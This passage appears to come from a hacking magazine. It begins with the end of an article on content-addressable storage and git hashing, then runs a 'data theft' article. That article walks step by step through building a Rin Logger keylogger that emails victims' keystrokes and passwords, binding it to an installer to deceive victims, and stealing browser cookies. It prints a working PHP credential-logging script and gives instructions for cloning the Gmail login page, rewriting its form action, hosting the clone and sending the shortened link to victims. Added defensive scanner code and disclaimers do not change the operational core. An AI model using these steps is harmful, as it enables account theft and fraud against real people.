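    a hash of `hash_bits` bits, 1 - exp(-n(n-1) / 2^(bits+1))."""
    exponent = -(n_objects * (n_objects - 1)) / 2 ** (hash_bits + 1)
    return -math.expm1(exponent)  # expm1 keeps precision for tiny exponents


def objects_for_collision_probability(hash_bits: int, p: float) -> float:
    """Invert the bound: roughly how many objects before the risk reaches p."""
    return math.sqrt(-2.0 * 2 ** hash_bits * math.log1p(-p))


if __name__ == "__main__":
    store = ContentStore()
    lorem = b"Lorem ipsum dolor sit amet.\n"      # the same 28-byte file as foo.txt
    key = store.put(lorem)
    print("foo.txt ->", key)                       # compare with Listing 1
    store.put(lorem)                               # bar.txt: no new object
    new_key = store.modify(key, 0, b"l")           # one-byte change, new address
    print("objects stored:", len(store), "old intact:", store.get(key) == lorem)
    print("P(collision) MD5, 2 objects:    %.3e" % collision_probability(128, 2))
    print("P(collision) MD5, 1e12 objects: %.3e" % collision_probability(128, 10**12))
    print("objects for 50%% MD5 collision: %.3e" % objects_for_collision_probability(128, 0.5))
```

Running the script prints the key for foo.txt so it can be compared with the value git reports in Listing 1. The birthday-bound helpers show why the 1:2^128 figure for two objects is only the beginning of the story: the risk grows with the square of the number of stored objects, and reaches 50% only around 2^64 objects for a 128-bit hash.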

Listing 2. Creating empty git repository II.

.git/objects/d2:
cf010d36ff3f5a199c335135f37ca40822b35b

# Using the content hash, we can request the content.
$ git cat-file -p d2cf010d36ff3f5a199c335135f37ca40822b35b
Lorem ipsum dolor sit amet.

# Filename is not important
$ cp foo.txt bar.txt
$ git hash-object -w bar.txt
d2cf010d36ff3f5a199c335135f37ca40822b35b

# But the content is
$ echo "foobar" > foo.txt
$ git hash-object -w foo.txt
323fae03f4606ea9991df8befbb2fca795e648fa

# And the original file will remain unchanged
$ git cat-file -p d2cf010d36ff3f5a199c335135f37ca40822b35b
Lorem ipsum dolor sit amet.
$ git cat-file -p 323fae03f4606ea9991df8befbb2fca795e648fa
foobar

Enterprise solutions use CAS as a backend for a more complex system implementing data replication, retention, secure shredding and other functions; these will be covered in following articles.

About the authors

Mr. Miroslav Ludvik graduated from the Czech Technical University in 1996. In 2005 he successfully defended his Ph.D. thesis on Data Security in Computer Networks and was awarded the Ph.D. degree. In 2000 he participated in securing the International Monetary Fund conference in Prague. He provides counseling to the Ministry of Interior of the Czech Republic and the Czech Data Protection Office. He also provides counseling for the private sector; among his clients are e.g. banks and prestigious legal firms. He teaches at a prestigious private Czech university and cooperates with the University of Žilina. He holds the office of Technical Director in the 4safety, a.s. company.

Mr. Radek Pilar is currently studying at the Czech Technical University, Prague and is employed as a storage consultant in the 4safety, a.s. company.

Data Stealing. Data Theft Prevention. Phishing.

Data stealing is the illegal access (by reading, editing, or copying) of data without the data owner's authorization. In other words, if a company's server has been accessed by a hacker it is a case of data theft. Even reading your colleague's mail would be treated as a crime in the eyes of the law. It is irrelevant whether you later used this data for misdeeds or not; what counts is that data that is not yours has been accessed without prior permission of its authorized user, who may also be its creator.

"One of the ways of hacking for data stealing is DDoSes, which have evolved from being a blunt-force attack to being a sophisticated diversionary attack disguising another attack." Sources said that financial service companies handling vast amounts of data are most susceptible to these tactics.

Figure 1: Data Theft.

In the past year, for example, phishing attacks have been directed at IT administrators at European banks. These eventually enabled malware to penetrate the banks' systems and steal login credentials.

As soon as the criminals had the login details, they launched the DDoS attacks against the banks. This was carefully timed so that it occurred on a Friday afternoon when IT departments were thinly staffed.

"Once the attack was launched, the IT department predictably moved resources to deal with the DDoS attack."

While this was happening, the cybercriminals launched the real attack, which allowed them to grab and clone private data that could be used to steal money.

They then handed the operation over to the monetization team, who created ATM cards, debit cards and credit cards, which were handed out to money mules.

The cybercriminal gang hired individual contractors who took the cards to ATM machines and drained $9m in 48 hours from a selection of accounts in cities across the world.

Types of Data Theft

Data can be stolen in many ways. Below are a few examples showing the ways of data theft.

Hacking: This is by far the most common way of stealing data with the least chance of getting caught. A hacker gets into a system where he or she is not supposed to be and steals whatever data he needs. Hackers find their 'gateway' through gaps in the security system or by hoodwinking gullible employees / surfers in order to gain access to a system.

Posing: Appearances can be deceiving. The attractive website that has popped up offering you a great holiday treat may actually be a data thief trying to get into your system under the 'mask' of a piece of harmless spam. In a case of corporate data theft last year, the thief posed as a potential customer and got entry to a company's data bank through the computer of an employee who did not suspect anything in his eagerness to catch a potential client.

Remote Access: Is the cursor moving about on its own even when you have not touched the mouse? Does the indicator show that a program is running even when you are not working on anything and have no windows open? Do not ignore the symptoms: a data thief is already sitting in your computer. Remote access allows the thief to gain control of your machine from wherever he or she is and operate it, steal data from it, and even distribute viruses from it!

Spyware: Spyware is often brought in by adware. The thief may not sit in your system, but your keystrokes or mouse clicks will be spied upon, revealing what you are doing and 'reading' the data as you put it in. And you have opened the gate by clicking on an innocent-looking ad.

Podslurping: Music is now stored on iPods for almost all domestic users. You would usually not suspect an employee rocking to music while working as usual. The thief knows this and is using the iPod to obtain data outputs from the computer it is plugged into.

Bluesnarfing: Bluetooth devices have become popular in a very short while. Using his or her Bluetooth-enabled cell phone or laptop, the data thief lifts data from a restricted computer in silence and mostly unnoticed.

Thumbsucking: Another tiny and dangerous device is the USB storage drive. All that an employee needs to do is plug in a pen drive, and 2 GB of data will flow quietly into the pocket from the computer.

Prevent Data Theft

At any time of day or night, a huge amount of data is being stored, retrieved and transferred in the average company or organization. As a responsible user, you must know how to protect your data and prevent data theft from mobile devices. The following are targets for thieves and intruders:

- USB thumb drive
- 3G mobile phone network
- Wireless LAN
- Removable hard disk
- Notebook computer
- Portable personal digital device like MP3 player, PDA, phones
- Printer output etc.
- Personal information such as bank account details
- Customer database
- Confidential/sensitive business information, e.g. tender information and quoted prices

The following are some useful security tips for preventing data theft:

- Protect your mobile devices.
- Data theft sometimes happens when you outsource your IT services. Learn how to prevent data loss from IT outsourcing.
- Review the access control policy.
- Encrypt your data.
- Protect your wireless network.
- Secure your company network.
- Conduct security risk assessments and regular security audits.

Figure 2: Preventing Data Theft.


Keylogger

Key logger software is a computer monitoring system that allows you to record all activities performed on your computer system. Key logger software has the ability to monitor online chat conversation details, visited websites, incoming and outgoing emails and other online activities performed on your PC. The log file created by the key logger can be sent to a specified receiver. Some key logger programs will also record any e-mail addresses you use and Web site URLs you visit.

Key loggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, key loggers can also be embedded in spyware, allowing your information to be transmitted to an unknown third party. Computer monitoring software works in invisible mode and does not appear on the Desktop, in Add/Remove Programs or in the Control Panel, and the installation path folders are hidden during installation. Keylogger software provides the facility to send details of recorded activities to a user-specified email address. A free keylogger download is available on the website.

How to hack IDs with Rin Logger

Run the keylogger file on your PC and click on "Create new".

Figure 3: Create New for creating server.exe file.

Now, enter the information as follows:

Email address: your email address (gmail recommended)
Account Password: password of your email address
Keylogger Recipients: enter your email address

Click on Next.

Figure 4: Set information for getting keylogs.

Now, enter the time duration between two emails. If you set it to 2 minutes, you will receive emails every 2 minutes. Hit on Next.

Figure 5: Set timing for getting keylogs.

Now, change Install keylogger to "Enabled". Name the file anything you want and select the Installation path as "Application data". Click on Next for the Downloader setup option, which will help you download your files off the internet and launch them.

Figure 7: Set Download Setup.

Create a custom message to fool your victim and click on Next.

Figure 8: Set Dialog setup for setting message for victim.

Click on "website viewer enable" to get updates on all the websites visited by the victim.

Figure 9: Set Website Viewer option for update of web links.

Select this option to bind our file with another file and click on Next.

Figure 10: Bind your server.exe file with other file.

This option can help you retrieve passwords from the web browser's cookies. Click on Next.

Figure 11: Set option for stealing cookies from web browser.

Use this option to get administrative control of your victim's system; enable it as per your choice and requirement and click on Next.

Figure 12: Use administrative control options.

You can use all other options according to your needs, but I am focusing only on the important aspects. Hit on Next until you see this option:

Hit on the "?" button beside every textbox to generate random product information. Hit on Next.

Figure 13: Bind your server.exe file with other file.

Now, hit on "Save As" and select the path where you want to save your keylogger server file. Click on "Compile". Done!!!

Figure 14: Save server.exe file.

That's it. You have successfully created a keylogger server file. Now, simply send this file to your friend. You can use the Binder within this keylogger or even opt for the IExpress binder to bind this keylogger server to any .exe file, maybe a software installer or so. This will remove any chance of doubt on the victim's side.

Figure 15: Successfully created file.

Now, simply send this file to your victim via email. Once the victim runs our keylogger, we will get key logs every 2 min via email as shown. Thus, the victim will run the file considering it a normal software installation and during this process, our keylogger server will install itself silently in the background without the victim's knowledge.

After keylogger server installation, you will start receiving all the victim's passwords like this:

Figure 16: Online logs on email ID.

Countermeasures

The effectiveness of countermeasures varies, because keyloggers use a variety of techniques to capture data and the countermeasure needs to be effective against the particular data capture technique. For example, an on-screen keyboard will be effective against hardware keyloggers, transparency will defeat some screen loggers - but not all of them - and an anti-spyware application that can only disable hook-based keyloggers will be ineffective against kernel-based keyloggers.

Moreover, keylogger software authors may be able to update the code to adapt to countermeasures that may have proven to be effective against them.

Anti keyloggers

An anti-keylogger is a piece of software specifically designed to detect keyloggers on a computer, typically comparing all files on the computer against a database of keyloggers, looking for similarities which might signal the presence of a hidden keylogger. As anti-keyloggers have been designed specifically to detect keyloggers, they have the potential to be more effective than conventional anti-virus software; some anti-virus software does not consider certain keyloggers a virus, and under some circumstances a keylogger can be considered a legitimate piece of software.

Figure 17: Anti-Keylogger for removing keylogger file.
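As an added example (not from the article or any anti-keylogger product), the signature comparison described above in its simplest form: hash every file under a directory tree and match it against a set of known-bad SHA-256 values, plus a heuristic that flags executables sitting in user data directories, which is where the keylogger built earlier in the article installs itself. The signature set and the sample tree are constructed inline; the function names and directory list are this example's own.

```python
"""Signature-based sweep for known keylogger binaries, plus a heuristic for
executables living in user data directories.

Added example, not from the article or any anti-keylogger product: the
signature set is a constructed placeholder and the directory heuristic is
this example's own.
"""
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List, Set

# Directory names the article's keylogger installer targets ("Application
# data"); an executable that lives only there is worth a second look.
USER_DATA_DIRS = {"AppData", "Application Data", ".config", ".local"}
EXECUTABLE_SUFFIXES = {".exe", ".dll", ".scr", ".com"}


def sha256_of(path: Path, chunk: int = 1 << 16) -> str:
    """Stream the file through SHA-256 so large binaries are not loaded whole."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def scan(root: Path, known_bad: Set[str]) -> Dict[str, List[str]]:
    """Walk `root`; report signature hits and executables under user data dirs.

    Paths are returned relative to `root`, in POSIX form and sorted, so the
    result is stable across platforms.
    """
    findings: Dict[str, List[str]] = {"signature_match": [], "executable_in_user_data": []}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            try:
                digest = sha256_of(path)
            except OSError:
                continue  # unreadable or vanished file; keep scanning
            rel = path.relative_to(root)
            if digest in known_bad:
                findings["signature_match"].append(rel.as_posix())
            if path.suffix.lower() in EXECUTABLE_SUFFIXES and USER_DATA_DIRS & set(rel.parts):
                findings["executable_in_user_data"].append(rel.as_posix())
    for hits in findings.values():
        hits.sort()
    return findings


def demo() -> Dict[str, List[str]]:
    """Build a throwaway tree with one constructed 'known bad' file and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        dropped = root / "AppData" / "Roaming" / "updater" / "updater.exe"
        dropped.parent.mkdir(parents=True)
        dropped.write_bytes(b"constructed sample standing in for a keylogger build")
        notes = root / "Documents" / "notes.txt"
        notes.parent.mkdir(parents=True)
        notes.write_bytes(b"harmless text")
        # The feed entry: a real deployment would load vendor or threat-intel hashes.
        signatures = {sha256_of(dropped)}
        return scan(root, signatures)


if __name__ == "__main__":
    for category, paths in demo().items():
        print(category, paths)
```

The two checks complement each other in the way the Countermeasures section describes: the hash match only catches builds already in the database, while the location heuristic is independent of the binary's contents but produces noise that needs human review.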

Phishing

You must have come across many fake login pages/scamming pages which are often used to hack IDs. Phishing is the easiest and the most "unethical way of hacking". It is true that phishing is not something great which only a few can do, and that is why it is considered unethical. But whatever it might be, hacking is hacking and there is obviously a need to know more about this type of exploitation. Before we go into the details, let us first see what phishing is all about.


<?php
// Redirect to the real site, then append every POSTed field to log.txt
header('Location: http://www.gmail.com');
$handle = fopen("log.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Figure 18: How Phishing works.

Phishing is a way of deceiving your victim by making him log in through one of your webpages which is a clone of the original one. By doing so, the fake webpage will log his E-mail ID and password. After that he will automatically be redirected to the original webpage, making him unsuspicious of what has just happened. This is used for criminal activities such as stealing credit cards etc. That is the exact reason why I DO NOT want you to use this for fraud. Use this only for educational purposes and not to cause any damage to any person in any way.

Phishing is the most popular and widely used method for hacking email accounts and it is not as easy as its name. Creating a phishing page is an easy task and anyone can download one from various hacking forums for free. The main step of phishing comes after creation of the fake login page.

Figure 19: Phishing Method.

How to create your own phishing page

1. Copy the script above and save it as log.php or login.php.

2. Now open the Gmail home page which you want to clone.

3. I'm creating a Gmail phishing login page!!

Figure 20: Creating home page of Gmail Fake Page.

4. RIGHT CLICK > Save as, and save the page with the name index.html like in the image.

Figure 21: Saving Gmail fake page with name index.html.


5. Now open it with Notepad and find the word "action" (you can use CTRL + F). Delete action=https://accounts.google.com/ServiceLoginAuth and use login.php? in place of the link. Save your script.

Figure 22: Save fake gmail page's source with name login.php.

NOW YOUR LOGIN.PHP AND INDEX.HTML PAGES ARE READY!

6. Your page is ready for uploading.

7. Create an account on free webhosting sites like (WWW.MY3GB.COM) or (WWW.5GB.COM).

Figure 23: Create an account on webhosting site like www.my3gb.com.


Upload your phishing page to your webhosting account. You should see something like this:

Figure 24: Upload fake page and php script on webhosting site.

AFTER UPLOADING IT, shorten the URL of the INDEX.HTML (NAME.MY3GB.COM/INDEX.HTML) with the Google URL shortener.

Next send the link (GOO.GL____) to the victim and make your victim log in, or send your fake URL of the FB login to your victim's e-mail.

Once your victim has logged in on your fake page, JUST RECEIVE THE PASSWORD IN LOG.TXT.

Figure 25: Credential hacking.
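The defensive counterpart to step 5, as an added example that is not part of the article: a check that parses a saved login page and reports any password form whose action would post somewhere other than the genuine host over HTTPS, which is exactly the change the clone relies on. Both HTML snippets are constructed (the cloned one carries the rewritten action from step 5), free-host.example is a placeholder host, and the class and function names are this example's own.

```python
"""Inspect a saved login page for forms that post credentials somewhere other
than the genuine site.

Added example, not from the article: the two HTML snippets are constructed,
free-host.example is a placeholder, and the names are this example's own.
"""
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple
from urllib.parse import urljoin, urlsplit

# Constructed stand-in for the genuine page: the form posts to the real service.
GENUINE_PAGE = """
<form method="post" action="https://accounts.google.com/ServiceLoginAuth">
  <input name="Email"><input type="password" name="Passwd">
</form>
"""

# Constructed stand-in for the clone: the same form after "action" was rewritten.
CLONED_PAGE = """
<form method="post" action="login.php?">
  <input name="Email"><input type="password" name="Passwd">
</form>
"""


class FormCollector(HTMLParser):
    """Record each form's action and whether it contains a password field."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[Dict[str, object]] = []
        self._current: Optional[Dict[str, object]] = None

    def handle_starttag(self, tag: str, attrs) -> None:
        attributes = {k: (v or "") for k, v in attrs}  # valueless attrs come as None
        if tag == "form":
            self._current = {"action": attributes.get("action", ""), "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if attributes.get("type", "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag: str) -> None:
        if tag == "form":
            self._current = None


def suspicious_login_forms(page_url: str, html: str, expected_host: str) -> List[Tuple[str, str]]:
    """Return (action, reason) for every password form that does not post to
    expected_host over https. Relative actions resolve against page_url, which
    is how a browser treats an action such as "login.php?"."""
    collector = FormCollector()
    collector.feed(html)
    problems: List[Tuple[str, str]] = []
    for form in collector.forms:
        if not form["password"]:
            continue
        action = str(form["action"])
        target = urlsplit(urljoin(page_url, action))
        if target.hostname != expected_host:
            problems.append((action, "posts to %s, expected %s" % (target.hostname, expected_host)))
        elif target.scheme != "https":
            problems.append((action, "posts over plain http"))
    return problems


if __name__ == "__main__":
    print(suspicious_login_forms("https://accounts.google.com/ServiceLogin",
                                 GENUINE_PAGE, "accounts.google.com"))
    print(suspicious_login_forms("http://free-host.example/index.html",
                                 CLONED_PAGE, "accounts.google.com"))
```

Resolving the action against the page's own URL is the important detail: a relative action looks harmless in the source, but a browser submits it to whatever host served the page, here the free hosting account rather than the real login service.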

Here are some suggested free web hosting websites

For phishing, cookie stealing and other hacking purposes you need help from web hosting sites. These addresses will help you a lot. Choose your favorite one and sign up; all of them are free.

1. 110mb - http://110mb.com
2. Ripway - http://ripway.com
3. SuperFreeHost - http://superfreehost.info
4. Freehostia - http://freehostia.com
5. Freeweb7 - http://freeweb7.com
6. t35 - http://t35.com
7. Awardspace - http://awardspace.com
8. PHPNet - http://phpnet.us
9. Free Web Hosting Pro - http://freewebhostingpro.com
10. ProHosts - http://prohosts.org
11. FreeZoka - http://www.freezoka.com/
12. 000webhost - http://000webhost.com/
13. AtSpace - http://atspace.com
14. My3gb - http://my3gb.com
15. Zymic - http://zymic.com

About the author

VIKAS KUMAR (ISHAN) is one of the leading computer security experts available in India. VIKAS KUMAR was born on 26 July 1990 in a town called Meerut, UP (India). VIKAS KUMAR started his group "hackers4u" on Facebook in the year 2010, and in two years he has made an impact on the World Wide Web with good ethical hacking articles; he is going to launch a website on Cyber Security & Ethical Hacking and is working with the anti-hacking community "I-hackers4u". The 22-year-old has the capability to compete with the best people in the business called "Ethical Hacking". Workshops and Seminars: VIKAS KUMAR has trained more than 3000 people from all around the world, from countries like India, Dubai, Sudan, United Kingdom, Thailand, Nigeria, Sri Lanka, Kenya, Australia, Kazakhstan, Canada, Ghana, United States, South Africa, China, Malaysia, Singapore, Oman, Yemen, Indonesia, Korea, Iran etc.

Thank you for reading our magazine from cover to cover. Please share with us your comments about this issue on Twitter: @Hackinsight or Facebook: http://www.facebook.com/hackinsight

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Become our Beta Tester and receive each article before publication date!